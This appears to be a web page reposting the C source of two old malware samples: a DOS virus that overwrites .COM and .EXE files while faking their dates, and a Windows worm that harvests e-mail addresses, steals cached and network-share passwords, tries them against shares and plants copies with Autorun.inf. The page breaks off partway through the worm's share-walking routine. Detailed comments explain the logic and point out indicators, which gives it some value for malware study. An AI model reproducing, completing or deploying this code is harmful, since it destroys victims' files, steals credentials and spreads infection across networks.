
 /* C-Virus:  A generic .COM and .EXE infector

   Written by Nowhere Man

   Project started and completed on 6-24-91

   Written in Turbo C++ v1.00 (works fine with Turbo C v2.00, too)
*/

[to protect the code from script kiddies.. header files are not given]

#pragma inline                              // Compile to .ASM

#include
#include
#include
#include
#include

void hostile_activity(void);
int infected(char *);
void spread(char *, char *);
void small_print(char *);
char *victim(void);

 #define DEBUG
#define ONE_KAY   1024                      // 1k
#define TOO_SMALL ((6 * ONE_KAY) + 300)               // 6k+ size minimum
#define SIGNATURE “NMAN”                    // Sign of infection

int main(void)
{
    /* Entry point of the infector.  _argv[0] (Borland runtime global)
       is the path of the executable that is running, i.e. the virus
       body; victim() picks the file to overwrite.  After spread() the
       program prints a fake "Out of memory" error through the BIOS
       teletype routine and returns 1.  Nothing here ever runs a host
       program: the file chosen by victim() is replaced wholesale. */

    spread(_argv[0], victim());             // Perform infection
    small_print(“Out of memory\r\n”);       // Print phony error
    return(1);                         // Fake failure…
}

void hostile_activity(void)
{
    /* Reached from victim() only when no file in the current directory
       qualifies for infection any more.  In this build the "payload" is
       three BEL characters plus a message on the BIOS console, followed
       by exit(2).  The author's note below invites replacing it. */

    /* Put whatever you feel like doing here…I chose to
       make this part harmless, but if you’re feeling
       nasty, go ahead and have some fun… */

    small_print(“\a\a\aAll files infected.  Mission complete.\r\n”);
    exit(2);
}

int infected(char *fname)
{
    /* Infection marker check: reads the 4 bytes at file offset 28 and
       compares them with SIGNATURE ("NMAN").  Returns non-zero when they
       match.  For detection this is the string to look for: 4E 4D 41 4E
       at offset 0x1C (which, for an MZ .EXE, falls in the reserved
       header words; for a .COM it is just code bytes).  spread() never
       writes the marker itself -- the copied body has to carry it.
       fopen() is not checked for NULL, and sig[4] is never written, so
       the DEBUG printf reads past the 4 bytes that fread() filled. */

    FILE *fp;                     // File handle
    char sig[5];                       // 4 marker bytes + one unused slot

    fp = fopen(fname, “rb”);
    fseek(fp, 28L, SEEK_SET);
    fread(sig, sizeof(sig) – 1, 1, fp);   // 4 bytes, no terminator added
#ifdef DEBUG
    printf(“Signature for %s:  %s\n”, fname, sig);
#endif
    fclose(fp);
    return(strncmp(sig, SIGNATURE, sizeof(sig) – 1) == 0);
}

void small_print(char *string)
{
    /* Writes a NUL-terminated string one character at a time with the
       BIOS teletype service (INT 10h, AH=0Eh) instead of the C runtime.
       SI is saved, loaded with the address of `string`, walked with
       LODSB until a zero byte, and restored.  `print` and `finish` are
       C labels the inline assembly jumps to. */

    asm {
         push si
         mov  si,string
         mov  ah,0xE
    }

print:   asm {
         lodsb
         or   al,al
         je   finish
         int  0×10
         jmp  short print
    }
finish: asm   pop  si
}

void spread(char *old_name, char *new_name)
{
    /* Overwrites new_name with the full contents of old_name (the
       running virus body), then restores the victim's DOS attributes,
       length and timestamp so a directory listing looks unchanged.
       The victim's original contents are read nowhere and are lost --
       this is an overwriting infector, not a prepender.  No fopen(),
       malloc(), fread() or fwrite() result is checked. */

    /* Variable declarations */

    FILE *old, *new;                   // File handles
    struct ftime file_time;                         // Old file date and time
    int attrib;                        // Old attributes
    long old_size, virus_size;              // Sizes of files
    char *virus_code = NULL;           // Pointer to virus
    int old_handle, new_handle;             // Handles for files

    /* Perform the infection */

#ifdef DEBUG
    printf(“Infecting %s with %s…\n”, new_name, old_name);
#endif
    old = fopen(old_name, “rb”);            // Open virus
    new = fopen(new_name, “rb”);            // Open victim
    old_handle = fileno(old);               // Get file handles
    new_handle = fileno(new);
    old_size = filelength(new_handle);      // Get old file size
    virus_size = filelength(old_handle);         // Get virus size
    attrib = _chmod(new_name, 0);           // _chmod(name, 0) returns the attribute byte
    getftime(new_handle, &file_time);       // Get old file time
    fclose(new);                       // Close the victim
    _chmod(new_name, 1, 0);                 // Clear all attribute bits so unlink() succeeds
    unlink(new_name);                  // Erase old file
    new = fopen(new_name, “wb”);            // Recreate it under the same name
    new_handle = fileno(new);
    virus_code = malloc(virus_size);        // Whole virus body is buffered in memory
    fread(virus_code, virus_size, 1, old);       // Read virus from old
    fwrite(virus_code, virus_size, 1, new);         // Copy virus to new
    _chmod(new_name, 1, attrib);            // Replace attributes
    chsize(new_handle, old_size);           // Truncate or pad to the victim's original length
    setftime(new_handle, &file_time);       // Replace old time

    /* Clean up */

    fcloseall();                       // Close files
    free(virus_code);                  // Free memory
}

char *victim(void)
{
    /* Chooses the next file to overwrite.  If a path was given on the
       command line and fopen() accepts it, that path is returned as-is
       (the FILE* opened for the test is never closed).  Otherwise the
       current directory is searched with findfirst()/findnext() over
       the patterns in types[] -- read-only, hidden and system files
       included -- and the first file that is not already marked (see
       infected()) and is larger than TOO_SMALL is returned.  ff_name
       lives in the static ffblk, so the returned pointer stays valid
       after return.  When nothing qualifies hostile_activity() is
       called, which exits; the final return(0) is never reached. */

    /* Variable declarations */

    char *types[] = {“*.EXE”, “*.COM”};          // Potential victims
    static struct ffblk ffblk;              // DOS file block
    int done;                     // Indicates finish
    int index;                         // Used for loop

    /* Find our victim */

    if ((_argc > 1) && (fopen(_argv[1], “rb”) != NULL))
         return(_argv[1]);

    for (index = 0; index < sizeof(types); index++) {
         done = findfirst(types[index], &ffblk, FA_RDONLY | FA_HIDDEN |
FA_SYSTEM | FA_ARCH);
         while (!done) {
#ifdef DEBUG
              printf(“Scanning %s…\n”, ffblk.ff_name);
#endif
              /* If you want to check for specific days of the week,
                 months, etc., here is the place to insert the
                 code (don’t forget to “#include “!) */

              if ((!infected(ffblk.ff_name)) && (ffblk.ff_fsize >
TOO_SMALL))
                   return(ffblk.ff_name);
              done = findnext(&ffblk);
         }
    }

    /* If there are no files left to infect, have a little fun… */

    hostile_activity();
    return(0);                         // Prevents warning
}

A worm in cpp

Posted on October 10, 2008 by admin | No Comments

// —[ w0rm.cpp ]—————————–[ http://harmony.haxors.com ]–//
//
// An exploration into remote network propagation using multiple techniques.
// The w0rm will spread via e-mail (MAPI) all local drives and any writable
// network shares. It collects passwords on the local system to be used in
// cracking any password protected shares on the network. It will write an
// Autorun.inf file in the root of any drives it can so when you open that
// drive, e.g. double click it the w0rm will execute and go resident :) .
// This code is obviously buggy and not intended to be actually used in the
// ‘real’ world. To determine if the payload should be deployed the w0rm
// sits on the network and plays a ‘game’ with other w0rms on that network
// segment via broadcast UDP messages. see relevant source for a proper
// idea of the ‘game’, its just a perverse example of too much time on ones
// hands :) . this is version 1.00 so there are bugs, incompatibilities with
// various flavors of windows and other anomalies – dose! but if you want
// something better write it yourself ;) (and send me a copy)
//
//               “this is the end, beautiful friend” – the doors
//
// —[ harmony :: temple of the screaming interrupt ]–[ nomelody@gmx.net ]–//

//–header-files————————————————————–//
#include <stdio.h>
#include <windows.h>
#include <mapi.h>
#include <io.h>
#include <dos.h>

#include <conio.h>
//–defines——————————————————————-//
#define MAX_LENGTH          128
#define MAX_RECIEVERS       50
#define MUTEX_NAME          “w0rm”
#define EARTH_WORM_JIM      “Readme.exe”

#define WORMGAME_PORT       12345
#define WORMGAME_MAX_WINS   10
#define WORMGAME_PKT_PLAY   0xFF
#define WORMGAME_PKT_WIN    0×80
//–globals——————————————————————-//
// Shared state, written from main() and WormMainThread() (no locking):
//   ptrEgo       - argv[0], the path of this executable; used as the mail
//                  attachment and (in commented-out code) the file to copy
//   buf          - scratch buffer for the cached-password callback pce()
//   addressList  - e-mail addresses harvested by propogateMAPI()
//   passwordList - candidate passwords collected by addPassword()
//   index        - number of entries in passwordList
char *ptrEgo, *buf;
char addressList[MAX_RECIEVERS][MAX_LENGTH], passwordList[50][MAX_LENGTH];
int index = 0;

// Record layout handed to the callback of mpr.dll's WNetEnumCachedPasswords
// (resolved by name in getCachedPasswords(), so not from the public headers).
// pce() treats abResource as cbResource bytes of resource name immediately
// followed by cbPassword bytes of password.
typedef struct tagPASSWORD_CACHE_ENTRY {
    WORD cbEntry;
    WORD cbResource;
    WORD cbPassword;
    BYTE iEntry;
    BYTE nType;
    BYTE abResource[1];
} PASSWORD_CACHE_ENTRY;

// Wire format of the UDP "game" packets exchanged by WormGameThread():
// a type byte (WORMGAME_PKT_PLAY or WORMGAME_PKT_WIN) and the number
// played.  The struct is sent raw with sizeof(), so any compiler padding
// between the two fields goes on the wire as well.
typedef struct WormGamePkt {
    BYTE pktType;
    int pktNum;
} AWORMGAMEPACKET;
//–function-declarations—————————————————–//
DWORD WINAPI WormGameThread( LPVOID );
DWORD WINAPI WormMainThread( LPVOID );

BOOL runningNT();
void propogateMAPI( void );
int initMAPI( void );
int validAddress( char * addr );
int sendMessage( int recipNum, LHANDLE lhSession );
int getSharePasswords( void );
int getCachedPasswords( void );
int addPassword( char * pwd );
void propogateDrive( void );
void attackDrive( char * drive, int type );
void propogateNet( LPNETRESOURCE lpnr );
int crackNetShare( char * share );
void releasePayload();

extern “C” int __stdcall RegisterServiceProcess( int dwProcessID, int dwType );
//–entry-point—————————————————————//
// WINAPI WinMain(HINSTANCE, HINSTANCE, LPSTR, int)
int main( int argc, char **argv )
{
        /* Process entry point.  In order:
             1. single-instance guard through a named mutex (MUTEX_NAME,
                "w0rm" -- a usable host indicator); a second copy exits;
             2. remember our own path (argv[0]) in ptrEgo;
             3. on Win9x, LoadLibrary("KERNAL32.DLL") as spelled, then
                RegisterServiceProcess(NULL, 1), which the author's comment
                says is meant to hide the process; on NT only a message;
             4. raise ourselves to HIGH_PRIORITY_CLASS;
             5. start WormMainThread (created suspended, then resumed) and
                block until it ends.  WormGameThread is never created in
                this build -- that code is commented out below.
           Finishes with a debug prompt, getch(), and releasing the mutex. */
        HANDLE hMutex, hEgo, hWormGameThread, hWormMainThread;
        DWORD WormGameThreadId, WormMainThreadId;

        // display explorer window if we need to, due to autorun.inf file :)
        // test for any command line…

        /* only allow one instance of worm to run on system at one time */
        hMutex = CreateMutex( NULL, TRUE, MUTEX_NAME);
            if(  GetLastError() == ERROR_ALREADY_EXISTS )
            {
                ExitProcess( 0 );
            }

        ptrEgo = argv[0];

        /* try to ‘hide’ the process */
            if( runningNT() == TRUE )
            {
                // hide process in winNT
                printf(“WORM running on WinNT\n”);
            } else {
                printf(“WORM running on Win9x\n”);
                LoadLibrary( “KERNAL32.DLL” );
                RegisterServiceProcess( NULL, 1);
            }

        /* go resident and give worm RAW power */
        hEgo = GetCurrentProcess();
        SetPriorityClass( hEgo, HIGH_PRIORITY_CLASS);

        // create suspended WormMainThread…
        hWormMainThread = CreateThread( NULL, 0, WormMainThread, 0, CREATE_SUSPENDED, &WormMainThreadId);
            if( hWormMainThread != NULL )
            {
                // set thread to time critical… ‘i wana take you higher’ – sly and the family stone
                //SetThreadPriority( hWormMainThread, THREAD_PRIORITY_TIME_CRITICAL);
                // resume thread execution…
                ResumeThread( hWormMainThread );
            }
 /*
        // create suspended WormGameThread…
        hWormGameThread = CreateThread( NULL, 0, WormGameThread, 0, CREATE_SUSPENDED, &WormGameThreadId);
            if( hWormGameThread != NULL )
            {
                // resume thread execution…
                ResumeThread( hWormGameThread );
            }                                         
                                                       */
        /* wait for hWormGameThread() to terminate */
     //   WaitForSingleObject( hWormGameThread, INFINITE);
        WaitForSingleObject( hWormMainThread, INFINITE);

        printf(“MAIN_DEBUG: worm threads ended, im outa here: press a key…\n”);
        getch();

        /* release our mutex, next local worm wont get blocked */
            if( hMutex != NULL )
            {
                ReleaseMutex( hMutex );
            }
        return 0;
}

//—————————————————————————-//
DWORD WINAPI WormMainThread( LPVOID )
{
        /* The propagation sequence, run once:
             1. propogateMAPI()      - harvest addresses from the MAPI inbox
                                       (mailing itself is disabled there);
             2. getSharePasswords()  - Win9x share passwords from the registry;
             3. getCachedPasswords() - Win9x password cache through mpr.dll;
             4. WNetGetUser()        - the logged-on user name, queued as one
                                       more candidate password (buff is 64
                                       bytes, which dwSize tells the API);
             5. propogateDrive()     - local fixed and mapped drives;
             6. propogateNet()       - browse the network and try disk shares.
           Ends the thread with ExitThread(0). */
        DWORD dwSize;
        char buff[64];
        printf(“WormMainThread: started…\n”);
        /* spread worm via MAPI */
        propogateMAPI();
        /* get any passwords we can for use later on */
        getSharePasswords();
        getCachedPasswords();
        dwSize = 64;
        WNetGetUser( NULL, buff, &dwSize );
        addPassword( buff );
        printf(“DEBUG: total pwds got = %d\n”, index);
        /* spread worm via any/all localy maped drives */
        propogateDrive();
        /* spread worm via any/all LAN network shares */
        propogateNet( NULL );
        /* finished our little game :) */
        ExitThread( 0 );
        return 0;
}
//—————————————————————————-//
DWORD WINAPI WormGameThread( LPVOID )
{
        /* The "game" that decides when releasePayload() runs.  Not started
           by main() in this build (its CreateThread is commented out).
           Network footprint: one UDP socket bound to INADDR_ANY:12345
           (WORMGAME_PORT) and one that broadcasts to 255.255.255.255:12345.
           Each round: pick rand() % 100 + 1, sleep 500 ms, broadcast a
           PLAY packet.  Incoming PLAY packets carrying the same number are
           answered with a WIN packet unicast to the sender (saddr_out is
           pointed at the sender for that one sendto, then reset to
           broadcast).  A received WIN bumps totalwins and restarts the
           round; after WORMGAME_MAX_WINS wins releasePayload() (a print
           in this version) runs and the counter resets.
           Notes on the visible logic: the "ignore local machine" comment
           has no matching code, so our own broadcast is processed like
           any other; fd_read is filled once before the loop and never
           re-armed; a select() timeout returns 0, which is != SOCKET_ERROR,
           so the inner loop goes on to a blocking recvfrom(). */

        WSADATA w;
        SOCKET s_recv, s_send;
        sockaddr_in saddr, saddr_in, saddr_out;
        int size = sizeof( struct sockaddr ), totalwins = 0, magicWorm = 0, optval;
        AWORMGAMEPACKET gamePkt;
        fd_set fd_read;
        struct timeval timeout = { 5, 0 };

            if( WSAStartup( MAKEWORD(1,0), &w) != 0 )
            {
                printf(“WormThread: WSAStartup failed\n”);
                goto endThread;
            }

        s_recv = socket( AF_INET, SOCK_DGRAM, IPPROTO_UDP);
        s_send = socket( AF_INET, SOCK_DGRAM, IPPROTO_UDP);
            if( s_recv == INVALID_SOCKET || s_send == INVALID_SOCKET )
            {
                printf(“WormThread: invalid socket\n”);
                goto endThread;
            }

        memset( &saddr_in, 0×00, sizeof( struct sockaddr));

        memset( &saddr, 0×00, sizeof( struct sockaddr));
        saddr.sin_family = AF_INET;
        saddr.sin_port = htons( WORMGAME_PORT );
        saddr.sin_addr.s_addr = INADDR_ANY;

        memset( &saddr_out, 0×00, sizeof( struct sockaddr) );
        saddr_out.sin_family = AF_INET;
        saddr_out.sin_port = htons( WORMGAME_PORT );
        saddr_out.sin_addr.s_addr = INADDR_BROADCAST;

        optval = 1;
            if( setsockopt( s_send, SOL_SOCKET, SO_BROADCAST , (char*)&optval, sizeof( int) ) == SOCKET_ERROR )
            {
                printf(“WormThread: setsocketopt failed\n”);
                goto endThread;
            }

            if( bind( s_recv, (struct sockaddr*)&saddr, sizeof( struct sockaddr)) == SOCKET_ERROR )
            {
                printf(“WormThread: bind failed\n”);
                goto endThread;
            }

        FD_ZERO( &fd_read );
        FD_SET( s_recv, &fd_read );
        randomize();                       // Borland RTL helper: seeds rand()
loop:
        while( 1 )
        {
               if( totalwins >= WORMGAME_MAX_WINS )
                {
                    releasePayload();
                    totalwins = 0;
                }
            // pick a magic number in 1..100
            magicWorm = ( ( rand() % 100 ) + 1 );
            printf(“WormThread: picked a magic num: %d\n”, magicWorm);
            // wait a length of time…
            Sleep( 500 );
            // broadcast our number as a PLAY packet
            gamePkt.pktType = WORMGAME_PKT_PLAY;
            gamePkt.pktNum = magicWorm;
                if( sendto( s_send, (const char*)&gamePkt, sizeof( struct WormGamePkt ), 0, (struct sockaddr*)&saddr_out, size) == SOCKET_ERROR )
                {
                    printf(“WormThread: sendto failed\n”);
                    break;
                }

            // handle responses (select() timeout of 5 s does not end this loop)
                while( select( 0, &fd_read, NULL, NULL, &timeout) != SOCKET_ERROR )
                {
                    if( recvfrom( s_recv, (char*)&gamePkt, sizeof( struct WormGamePkt ), 0, (struct sockaddr*)&saddr_in, &size) == SOCKET_ERROR )
                    {
                        printf(“WormThread: recvfrom failed\n”);
                        break;
                    } else {
                        switch( gamePkt.pktType )
                        {
                            case WORMGAME_PKT_PLAY: // received a magic number…
                                // ignore responce from local machine… (no code does this)
                                printf(“WormThread: recieved a magic num: %d\n”, gamePkt.pktNum);
                                // process other responses
                                    if( gamePkt.pktNum == magicWorm )
                                    {
                                        // notify the sender that it "won": unicast a WIN packet back
                                        gamePkt.pktType = WORMGAME_PKT_WIN;
                                        saddr_out.sin_addr.s_addr = saddr_in.sin_addr.s_addr;
                                        sendto( s_send, (const char*)&gamePkt, sizeof( struct WormGamePkt ), 0, (struct sockaddr*)&saddr_out, size);
                                        saddr_out.sin_addr.s_addr = INADDR_BROADCAST;
                                    }
                                break;
                            case WORMGAME_PKT_WIN: // im a winner :)
                                printf(“WormThread: IM A WINNER!!!\n”);
                                totalwins++;
                                goto loop;
                            default:   // unknown packet type
                                printf(“WormThread: its all gone bugfuck!\n”);
                                break;
                        }
                    }
                } // while(select…
        }
endThread:
        closesocket( s_recv );
        closesocket( s_send );
        ExitThread( 0 );
        return 0;
}
//—————————————————————————-//
BOOL runningNT()
{
        /* Platform probe used to select the Win9x-only paths (process
           "hiding" in main(), LanMan share passwords in
           getSharePasswords()).  Returns TRUE only when GetVersionEx()
           reports VER_PLATFORM_WIN32_NT; Win9x and any other platform
           id yield FALSE. */
        OSVERSIONINFO info;

        info.dwOSVersionInfoSize = sizeof( info );
        GetVersionEx( &info );

        return ( info.dwPlatformId == VER_PLATFORM_WIN32_NT ) ? TRUE : FALSE;
}
//—————————————————————————-//
void propogateMAPI( void )
{
        /* Address harvester.  After initMAPI() confirms mapi32.dll is
           present, logs on with no profile name or password (whatever
           the default session gives), walks the message store with
           MAPIFindNext() and peeks each message with MAPIReadMail().
           The originator address and the first recipient address are
           appended to addressList when validAddress() accepts them --
           up to two per message, while the loop test checks i only once
           per message.  MAPIFreeBuffer() runs once, for the last message.
           sendMessage() is commented out, so this build only prints the
           collected list. */
        LHANDLE lhSession;
        CHAR rgchMsgID[513];
        MapiMessage *lpMessage;
        int i=0;
            if( initMAPI() != 0 )
            {
                return;
            }
            if( MAPILogon( 0, NULL, NULL, 0, 0, &lhSession) == SUCCESS_SUCCESS)
            {
                *rgchMsgID = NULL;
                    while( i < MAX_RECIEVERS )
                    {
                        if( MAPIFindNext( lhSession, 0L, NULL, rgchMsgID, MAPI_LONG_MSGID, 0L, rgchMsgID) != SUCCESS_SUCCESS)
                        {
                            break;
                        }
                        if( MAPIReadMail( lhSession, 0L, rgchMsgID, MAPI_PEEK, 0L, &lpMessage) == SUCCESS_SUCCESS)
                        {
                    //    printf(“DOING: %s\n\t%s\n”,lpMessage->lpOriginator->lpszAddress,lpMessage->lpRecips->lpszAddress);
                            if( validAddress( lpMessage->lpOriginator->lpszAddress ) == 0 )
                            {
                                strcpy( addressList[i], lpMessage->lpOriginator->lpszAddress);
                                i++;
                            }
                            if( validAddress( lpMessage->lpRecips->lpszAddress  ) == 0 )
                            {
                                strcpy( addressList[i], lpMessage->lpRecips->lpszAddress);
                                i++;
                            }
                        }

                    }
                MAPIFreeBuffer( lpMessage );

                // TO DO: sort addressList and remove duplicates…

                //sendMessage( i, lhSession );    // <—- !!!!!!

                MAPILogoff( lhSession, 0L, 0L, 0L);
            }
            for( int x = 0 ; x < i ; x++ )
            {
                printf(“DEBUG: attacking:\t%s\n”, addressList[x]);
            }
        return;
}
//—————————————————————————-//
int initMAPI( void )
{
        /* Presence check for Simple MAPI.  Loads mapi32.dll and looks up
           MAPILogon/MAPIFindNext/MAPIReadMail/MAPISendMail by name into
           four *local* function pointers that are discarded on return;
           the direct calls in propogateMAPI() and sendMessage() do not go
           through them.  Returns -1 if the DLL or any export is missing,
           otherwise 0.  The library handle is never freed. */
        HINSTANCE hi;
        LPMAPILOGON MAPILogon;
        LPMAPIFINDNEXT MAPIFindNext;
        LPMAPIREADMAIL MAPIReadMail;
        LPMAPISENDMAIL MAPISendMail;
        hi = LoadLibrary( “mapi32.dll” );
            if( hi == NULL )
            {
                return -1;
            }
        MAPILogon = (LPMAPILOGON)GetProcAddress( hi, “MAPILogon”);
        MAPIFindNext = (LPMAPIFINDNEXT)GetProcAddress( hi, “MAPIFindNext”);
        MAPIReadMail = (LPMAPIREADMAIL)GetProcAddress( hi, “MAPIReadMail”);
        MAPISendMail = (LPMAPISENDMAIL)GetProcAddress( hi, “MAPISendMail”);
            if( MAPILogon == NULL || MAPIFindNext == NULL || MAPIReadMail == NULL || MAPISendMail == NULL )
            {
                return -1;
            }
        return 0;
}
//—————————————————————————-//
int validAddress( char * addr )
{
        /* Cheap plausibility test for a harvested e-mail address.
           Returns 0 when addr is non-empty, shorter than MAX_LENGTH (so it
           fits an addressList slot) and contains both an '@' and a '.';
           -1 otherwise.  addr must be a valid C string. */
        size_t len = strlen( addr );

        if( len == 0 || len >= MAX_LENGTH )
        {
            return -1;
        }
        if( strchr( addr, '@' ) == NULL || strchr( addr, '.' ) == NULL )
        {
            return -1;
        }
        return 0;
}
//—————————————————————————-//
int sendMessage( int recipNum, LHANDLE lhSession )
{
        /* Mass-mailer (never called in this build -- the call in
           propogateMAPI() is commented out).  Builds one MAPI_TO recipient
           per entry in addressList[0..recipNum-1], attaches our own
           executable (ptrEgo) under the display name EARTH_WORM_JIM
           ("Readme.exe"), subject "The Subjext", and submits it through
           MAPISendMail() on lhSession.  Returns 0 on success; -1 on
           failure, in which case recips is not freed. */
        MapiRecipDesc *recips  = (MapiRecipDesc *)malloc( recipNum*sizeof(MapiRecipDesc) );
        MapiFileDesc attachment = { 0, 0, (ULONG)-1, ptrEgo, EARTH_WORM_JIM, NULL};
            for( int i=0 ; i<recipNum ; i++ )
            {
                recips[i].ulReserved   = 0;
                recips[i].ulRecipClass = MAPI_TO;
                recips[i].lpszName     = addressList[i];
                recips[i].lpszAddress  = addressList[i];
                recips[i].ulEIDSize    = 0;
                recips[i].lpEntryID    = NULL;
            }
        MapiMessage note = { 0, “The Subjext”, “The Message Text”, NULL, NULL, NULL, 0, NULL, recipNum, recips, 1, &attachment};
            if( MAPISendMail( lhSession, 0L, &note, 0L, 0L) != SUCCESS_SUCCESS )
            {
                return -1;
            }
        free( recips );
        return 0;
}
//—————————————————————————-//
int CALLBACK pce(PASSWORD_CACHE_ENTRY *x, DWORD)
{
        /* Enumeration callback for WNetEnumCachedPasswords() (see
           getCachedPasswords()).  The password bytes sit right after the
           resource name inside abResource, so cbPassword bytes are copied
           from abResource + cbResource into the shared 1024-byte buf,
           NUL-terminated, and queued with addPassword().  Always returns 0. */
        memmove(buf, x->abResource+x->cbResource, x->cbPassword);
        buf[x->cbPassword] = 0;
        addPassword( buf );
        return 0;
}
//—————————————————————————-//
int getCachedPasswords( void )
{
        /* Harvests the Win9x password cache.  Allocates the shared buf
           that pce() writes into (never freed), loads mpr.dll and resolves
           WNetEnumCachedPasswords by name (it is not in the public headers,
           hence the cast to a hand-written prototype), then enumerates
           every entry type (0xff) through pce().  Returns -1 if the DLL or
           the export is missing, otherwise 0 after FreeLibrary(). */
        buf = new char[1024];
        HINSTANCE hi = LoadLibrary(“mpr.dll”);
            if( hi == NULL )
            {
                return -1;
            }
        WORD (__stdcall *enp)(LPSTR, WORD, BYTE, void*, DWORD) = (WORD (__stdcall *)(LPSTR, WORD, BYTE, void*, DWORD))GetProcAddress(hi, “WNetEnumCachedPasswords”);
            if( enp == NULL )
            {
                return -1;
            }
        enp( 0, 0, 0xff, pce, 0);
        FreeLibrary( hi );
        return 0;
}
//—————————————————————————-//
unsigned char rotr( unsigned char b )   /* BYTE in <windows.h> is unsigned char */
{
        /* Rotate an 8-bit value right by one position: bit 0 wraps around
           into bit 7.  Used by decodePW() to advance its XOR key after
           every byte.  The int promotion from `b << 7` is truncated back
           to 8 bits by the cast. */
        return (unsigned char)( ( b >> 1 ) | ( b << 7 ) );
}
//—————————————————————————-//
void decodePW( char * pw )
{
        /* In-place de-obfuscation of the Parm1enc / Parm2enc registry
           values read by getSharePasswords(): every byte is XORed with a
           running key that starts at 0x35 and is rotated right by one bit
           (rotr) after each byte.  Stops at the first NUL in the buffer;
           a NULL pw is tolerated.  The caller NUL-terminates at the value
           length before calling this. */
        BYTE hash = 0×35;
            while( pw && *pw )
            {
                *pw = *pw ^ hash;
                pw++;
                hash = rotr( hash );
            }
}
//—————————————————————————-//
int addPassword( char * pwd )
{
        /* Appends pwd to passwordList when its length is in (0, MAX_LENGTH)
           and echoes it to stdout; anything else is silently dropped.
           `index` counts the stored entries and is the bound used by
           crackNetShare(); nothing here compares it with the 50 slots
           passwordList declares.  Always returns 0. */
            if( (strlen(pwd) > 0) && (strlen(pwd) < MAX_LENGTH) )
            {
                strcpy( passwordList[ index ], pwd);
                printf(“DEBUG: ADDED: %s\n”, passwordList[ index ]);
                index++;
            }
        return 0;
}
//—————————————————————————-//
int getSharePasswords( void ){
        /* Win9x only (returns at once on NT).  Walks the per-share subkeys
           of HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan
           and reads the Parm1enc and Parm2enc values, which the author
           treats as the share's full-access ("wright") and read-only
           passwords.  Each value is NUL-terminated at the returned length,
           run through decodePW() and queued with addPassword() for later
           use by crackNetShare().  No registry return code is checked;
           RegCloseKey(subkey) runs once, for the last subkey opened.
           Always returns 0. */
        if( runningNT() == FALSE )
        {
            HKEY key, subkey;
            DWORD i, maxKeys, len, junk;
            char keyName[256], wrightPwd[256], readPwd[256];
            RegOpenKeyEx(HKEY_LOCAL_MACHINE, “SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan”, 0, NULL, &key);
            RegQueryInfoKey (key, NULL, NULL, NULL, &maxKeys, NULL, NULL,NULL, NULL, NULL, NULL, NULL);
                if( maxKeys != 0 )
                {
                    for( i=0; i<maxKeys; i++ )
                    {
                        RegEnumKey(key, i, keyName, 256);
                        RegOpenKeyEx(key, keyName, 0, NULL, &subkey);
                        wrightPwd[0] = readPwd[0] = 0;

                        len = 256;
                        RegQueryValueEx(subkey, “Parm1enc”, NULL, &junk, (BYTE *)wrightPwd, &len);
                        wrightPwd[len] = 0;
                        decodePW(wrightPwd);
                        addPassword( wrightPwd );

                        len = 256;
                        RegQueryValueEx(subkey, “Parm2enc”, NULL, &junk, (BYTE *)readPwd, &len);
                        readPwd[len] = 0;
                        decodePW(readPwd);
                        addPassword( readPwd );
                    }
                }
            RegCloseKey(subkey);
            RegCloseKey(key);
        }
        return 0;
}
//—————————————————————————-//
void propogateDrive( void )
{
        /* Local-drive spreader.  GetLogicalDriveStrings() fills buff with
           the root strings ("C:\", "D:\", ...); each DRIVE_FIXED or
           DRIVE_REMOTE result is handed to attackDrive() with type 1.
           The loop runs length/4 + 1 times and, rather than moving ptr to
           the next string, increments the first character of buff (the
           drive letter) in place -- so the letters tried run consecutively
           from the first one returned.  Other drive types are skipped. */
        int length;
        char buff[MAX_LENGTH], *ptr;

        ptr = buff;
        length = GetLogicalDriveStrings( MAX_LENGTH, ptr) ;

        if( length > 0 && length < MAX_LENGTH)
        {
            for( int i=0 ; i<=(length/4) ; i++ )
            {
                    switch( GetDriveType( ptr ) )
                    {
                        case DRIVE_FIXED:
                            // The drive is a local drive.
                            printf(“DRIVE_FIXED: %s\n”, ptr);
                            attackDrive( ptr, 1 );
                            break;
                        case DRIVE_REMOTE:
                            // The drive is a network drive.
                            printf(“DRIVE_REMOTE: %s\n”, ptr);
                            attackDrive( ptr, 1 );
                            break;
                        default:
                            break;
                    }
                *ptr+=1;                    // bumps the drive letter in buff[0]
            }
        }
        return;
}
//—————————————————————————-//
void attackDrive( char * drive, int type )
{
        /* Drop point for a copy of the worm.  Builds the target path as
           drive + EARTH_WORM_JIM ("Readme.exe"); type 1 means drive already
           ends in '\' (local root), type 0 means a UNC share name, so a
           '\' is inserted.  The path is only printed: the CopyFile() and
           the Autorun.inf writer ("[Autorun]\nOPEN=Readme.exe", then
           marked hidden + read-only) are commented out below, so this
           build writes nothing to the target.  The unchecked sprintf
           into the 128-byte buff is the author's. */
        FILE *fpAutorun;
        char buff[MAX_LENGTH];
        // copy worm to drive, Attribute = hidden
            if( type == 1 )
            {
                sprintf( buff, “%s%s”, drive, EARTH_WORM_JIM);
            } else {
                sprintf( buff, “%s\\%s”, drive, EARTH_WORM_JIM);
            }
        printf(“DEBUG: propogateDrive: attacking %s\nATTACK REMOTE: %s\n”, drive, buff);
        /*    if( CopyFile( ptrEgo, buff, FALSE) == TRUE && type == 1 )
            {
                // create an Autorun.inf file on drive, Attribute = hidden
                sprintf( buff, “%sAutorun.inf”, drive);
                fpAutorun = fopen(buff, “w”);
                    if( fpAutorun != NULL )
                    {
                        fprintf( fpAutorun, “[Autorun]\nOPEN=%s\n”, EARTH_WORM_JIM);
                        fclose( fpAutorun );
                        _rtl_chmod(buff, 1, FA_HIDDEN | FA_RDONLY);
                    }
            }   */
        return;
}
//—————————————————————————-//
void propogateNet( LPNETRESOURCE lpnr )
{
        /* Recursive walk of the network neighbourhood (RESOURCE_GLOBALNET,
           any type).  Container entries (workgroups, servers) recurse;
           for the rest, an entry whose dwUsage has the RESOURCETYPE_DISK
           bit set (note: dwUsage is tested, not dwType) gets a
           WNetAddConnection() with no credentials.  ERROR_INVALID_PASSWORD
           leads to crackNetShare(); every other result -- including
           other error codes -- takes the else branch and is treated as an
           open share.  Either way attackDrive() (type 0, UNC name) runs and
           the connection is cancelled.  A 16 KiB buffer is GlobalAlloc'd on
           every pass through the loop; only the last one is freed. */
        DWORD dwResult, dwResultEnum, cbBuffer = 16384, cEntries = 0xFFFFFFFF;
        HANDLE hEnum;
        LPNETRESOURCE lpnrLocal;
        dwResult = WNetOpenEnum( RESOURCE_GLOBALNET, RESOURCETYPE_ANY, 0, lpnr, &hEnum);
            if( dwResult != NO_ERROR )
            {
                return;
            }
            do
            {
